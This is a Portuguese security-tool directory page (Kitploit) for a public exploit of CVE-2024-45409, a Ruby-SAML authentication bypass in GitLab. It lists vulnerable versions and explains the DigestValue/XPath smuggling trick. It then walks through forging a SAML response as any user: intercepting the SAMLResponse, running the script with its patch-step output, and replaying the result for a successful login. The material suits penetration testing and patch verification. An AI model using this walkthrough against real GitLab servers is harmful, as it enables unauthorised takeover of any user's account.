Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-45409 — Exploit de bypass de autenticação Ruby-SAML / GitLab (CVE-2024-45409) | Kitploit
Ferramentas/GitHubGitHub/synacktiv/cve-2024-45409
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Exploit de bypass de autenticação Ruby-SAML / GitLab (CVE-2024-45409)

Ver Repositório
8413há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de bypass de autenticação Ruby-SAML / GitLab (CVE-2024-45409)

Este script explora a CVE-2024-45409, que permite que um atacante não autenticado, com acesso a qualquer documento SAML assinado emitido pelo IDP, forje uma Resposta/Asserção SAML e obtenha acesso como qualquer usuário no GitLab.

Todas as seguintes versões do GitLab (CE/EE) são vulneráveis:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

Este exploit injeta o DigestValue da asserção modificada no elemento StatusDetail, permitindo contrabandear o seletor XPath que usará esse valor em vez do que está no bloco SignedInfo.

Requisitos

  • Uma resposta SAML válida emitida pelo IDP

Uso

root@kitploit:~
apt install python3-lxml

Primeiro, intercepte a URL e a resposta SAML do IDP codificada em Base64; depois, modifique o conteúdo XML usando o script.

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64

Em seguida, substitua o valor do parâmetro SAMLResponse pela saída do script. Se a autenticação for bem-sucedida, você será redirecionado para a página inicial do GitLab.

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>

Referências

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
Baixar ferramenta